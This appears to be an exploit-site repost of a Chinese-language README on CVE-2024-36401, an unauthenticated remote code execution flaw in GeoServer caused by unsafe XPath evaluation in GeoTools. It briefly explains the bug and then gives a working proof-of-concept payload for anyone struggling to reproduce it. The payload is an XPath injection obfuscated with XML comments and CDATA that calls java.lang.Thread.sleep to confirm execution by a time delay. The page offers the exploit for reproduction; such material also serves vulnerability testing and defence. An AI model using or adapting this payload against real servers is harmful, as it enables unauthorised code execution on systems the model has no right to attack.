Share
## https://sploitus.com/exploit?id=35C24506-148B-5DE5-976D-ED63C9D0F272
# CVE-2024-36401
CVE-2024-36401 是由于 GeoServer 使用的 GeoTools 库在解析 XPath 表达式时存在安全问题,导致未授权的攻击者可以通过构造恶意的 OGC 请求参数执行任意代码。
具体来说,该漏洞源于对属性名称作为 XPath 表达式进行不安全的评估,影响所有版本的 GeoServer。
如果有人在复现CVE-2024-36401漏洞时遇到困难,可以尝试以下代码:
```java
/+java.lang.T<!--IgnoreMe!!!!-->hread.s[(: IGNORE :)]leep
 	<![CDATA[
(2000)
]]>
```
这是一个基于时间的代码,可以证明代码执行成功。(java.lang.Thread.sleep)
![image](https://github.com/zgimszhd61/CVE-2024-36401/assets/114722053/b2f08f11-cac4-4456-a25d-39a18b399ca4)